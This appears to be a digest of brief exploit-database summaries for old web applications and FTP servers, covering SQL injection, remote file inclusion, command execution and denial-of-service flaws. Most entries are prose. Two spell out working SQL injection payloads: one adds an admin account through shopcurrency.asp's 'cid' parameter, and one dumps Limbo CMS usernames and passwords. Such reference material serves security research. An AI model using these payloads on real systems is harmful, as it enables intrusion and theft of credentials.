The SQL Injection bug is in the shopcurrency.asp file under the 'cid' query. A quick hack to add user a/a is '/shopcurrency.asp?cid=AUD';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--. To remove the user 'a', the command is '/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--.
A denial of service vulnerability exists in TinyFTPD 1.4 and earlier. A remote attacker can send a specially crafted USER command with an overly long argument to cause the service to crash.
The vulnerability is caused due to an error within the handling of the argument passed to the 'USER' command. This can be exploited to crash the FTP server via an overly long argument that contains certain character sequences.
HiveMail is vulnerable to a remote command execution vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious command in the 'command' parameter. This will allow the attacker to execute arbitrary commands on the vulnerable system.
This exploit is a python script that allows an attacker to execute arbitrary code on a vulnerable system. The exploit takes advantage of a vulnerability in the RBAWStatsMigrate module, which allows an attacker to inject malicious code into the system. The exploit then uses a perl one-line tcp connect-back code to connect to the attacker's system and execute the code.
FileCopa is vulnerable to a Denial of Service (DoS) attack due to a lack of proper input validation. By sending a specially crafted USER command with a large number of new line characters, the FTP process can be killed.
TotalCalendar <=2.30 is vulnerable to a remote file include vulnerability. This vulnerability allows an attacker to include a remote file, usually resulting in a remote command execution.
Statit V4 Remote File Inclusion exploit is a vulnerability that allows an attacker to include a remote file on the web server. This vulnerability is present in the Statit V4 web application. The attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable web application. The attacker can then execute arbitrary code on the web server.
This exploit allows an attacker to gain access to the username and password of a user in the Limbo CMS system. The attacker can send a malicious GET request to the index.php page with the option=weblinks parameter and an additional parameter of catid=-1 union select 0,1,2,concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password),4,5,6,7,8,9,10,11 from lm_users where id=[user_id]/*. This will return the username and password of the user with the specified user_id.
There is a Buffer overflow at the USER command in acFtpd. The exploit can be used by sending an overflow string to the FTP server. This will cause the server to crash.